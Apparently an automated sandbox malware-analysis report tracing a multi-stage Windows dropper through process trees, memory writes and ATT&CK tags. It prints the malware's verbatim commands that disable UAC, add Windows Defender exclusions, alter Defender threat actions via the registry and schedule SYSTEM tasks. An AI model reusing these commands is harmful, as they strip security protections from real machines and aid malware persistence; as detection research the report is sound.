Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeDebugPrivilege	4232	jok.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe

Suspicious use of FindShellTrayWindow 54 IoCs

pid	Process
3432	amert.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
2584	chrome.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe

Suspicious use of SendNotifyMessage 50 IoCs

pid	Process
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
2584	chrome.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe
4528	76c1f15004.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 4656	2112	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe	86
PID 2112 wrote to memory of 4656	2112	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe	86
PID 2112 wrote to memory of 4656	2112	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe	86
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 4428	4656	explorta.exe	93
PID 4656 wrote to memory of 3432	4656	explorta.exe	96
PID 4656 wrote to memory of 3432	4656	explorta.exe	96
PID 4656 wrote to memory of 3432	4656	explorta.exe	96
PID 4656 wrote to memory of 1688	4656	explorta.exe	98
PID 4656 wrote to memory of 1688	4656	explorta.exe	98
PID 4656 wrote to memory of 1688	4656	explorta.exe	98
PID 3432 wrote to memory of 468	3432	amert.exe	99
PID 3432 wrote to memory of 468	3432	amert.exe	99
PID 3432 wrote to memory of 468	3432	amert.exe	99
PID 4656 wrote to memory of 4528	4656	explorta.exe	100
PID 4656 wrote to memory of 4528	4656	explorta.exe	100
PID 4656 wrote to memory of 4528	4656	explorta.exe	100
PID 4528 wrote to memory of 2584	4528	76c1f15004.exe	101
PID 4528 wrote to memory of 2584	4528	76c1f15004.exe	101
PID 2584 wrote to memory of 1176	2584	chrome.exe	103
PID 2584 wrote to memory of 1176	2584	chrome.exe	103
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3136	2584	chrome.exe	104
PID 2584 wrote to memory of 3904	2584	chrome.exe	105
PID 2584 wrote to memory of 3904	2584	chrome.exe	105
PID 2584 wrote to memory of 928	2584	chrome.exe	106

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
"C:\Users\Admin\AppData\Local\Temp\fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4656
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:4428
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:468
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2968
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 868
        6⤵
        Program crash
        
        PID:1684
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4232
      - C:\Users\Admin\AppData\Local\Temp\enpl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\enpl.exe"
        6⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Elimination Elimination.cmd & Elimination.cmd & exit
        7⤵
        
        PID:1508
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:552
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1020
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4556
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:5272
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5368
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:5376
        
        C:\Users\Admin\Pictures\3rc2RLbt0QnRe3wK5yVJOB5Q.exe
        
        "C:\Users\Admin\Pictures\3rc2RLbt0QnRe3wK5yVJOB5Q.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\u4os.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4os.0.exe"
        8⤵
        Executes dropped EXE
        
        PID:2112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 2072
        9⤵
        Program crash
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\u4os.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4os.1.exe"
        8⤵
        Executes dropped EXE
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 1004
        8⤵
        Program crash
        
        PID:2328
        
        C:\Users\Admin\Pictures\oR5XYGuEOu0eN2kqrYnCF36U.exe
        
        "C:\Users\Admin\Pictures\oR5XYGuEOu0eN2kqrYnCF36U.exe"
        7⤵
        Executes dropped EXE
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6360
        
        C:\Users\Admin\Pictures\oR5XYGuEOu0eN2kqrYnCF36U.exe
        
        "C:\Users\Admin\Pictures\oR5XYGuEOu0eN2kqrYnCF36U.exe"
        8⤵
        
        PID:2044
        
        C:\Users\Admin\Pictures\58lh1kSDR5QgDdkR8Dg4gafR.exe
        
        "C:\Users\Admin\Pictures\58lh1kSDR5QgDdkR8Dg4gafR.exe"
        7⤵
        Executes dropped EXE
        
        PID:5124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4460
        
        C:\Users\Admin\Pictures\Ixl4oRZ5ssjR15YA9xS7hYbf.exe
        
        "C:\Users\Admin\Pictures\Ixl4oRZ5ssjR15YA9xS7hYbf.exe"
        7⤵
        Executes dropped EXE
        
        PID:5196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1172
        
        C:\Users\Admin\Pictures\Ixl4oRZ5ssjR15YA9xS7hYbf.exe
        
        "C:\Users\Admin\Pictures\Ixl4oRZ5ssjR15YA9xS7hYbf.exe"
        8⤵
        
        PID:3960
        
        C:\Users\Admin\Pictures\6HCYl2ScCL5GeAh93IDkEpIs.exe
        
        "C:\Users\Admin\Pictures\6HCYl2ScCL5GeAh93IDkEpIs.exe"
        7⤵
        Executes dropped EXE
        
        PID:5284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6248
        
        C:\Users\Admin\Pictures\9jwfgRbC93y6EDVIWJbqkK0O.exe
        
        "C:\Users\Admin\Pictures\9jwfgRbC93y6EDVIWJbqkK0O.exe"
        7⤵
        Modifies firewall policy service
        Windows security bypass
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5504
        
        C:\Users\Admin\Pictures\YuxvMHd8veUMYWJ75HoYGoEE.exe
        
        "C:\Users\Admin\Pictures\YuxvMHd8veUMYWJ75HoYGoEE.exe"
        7⤵
        Executes dropped EXE
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\7zSEACD.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Executes dropped EXE
        
        PID:2800
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:6352
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:6392
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:6472
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:6488
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:6504
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:6736
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:6764
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:6896
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:6932
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:7008
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:7040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7064
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:6592
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5672
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 02:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSEACD.tmp\Install.exe\" it /iYvdidvYGa 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:6864
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:6788
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:7136
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:452
        
        C:\Users\Admin\Pictures\eDS2T5kfDy459D9H7QOwXtFX.exe
        
        "C:\Users\Admin\Pictures\eDS2T5kfDy459D9H7QOwXtFX.exe"
        7⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\7zSFD1D.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:6768
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:756
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:7060
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:400
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:6684
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3276
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:6840
        
        C:\Windows\SysWOW64\cmd.exe
        
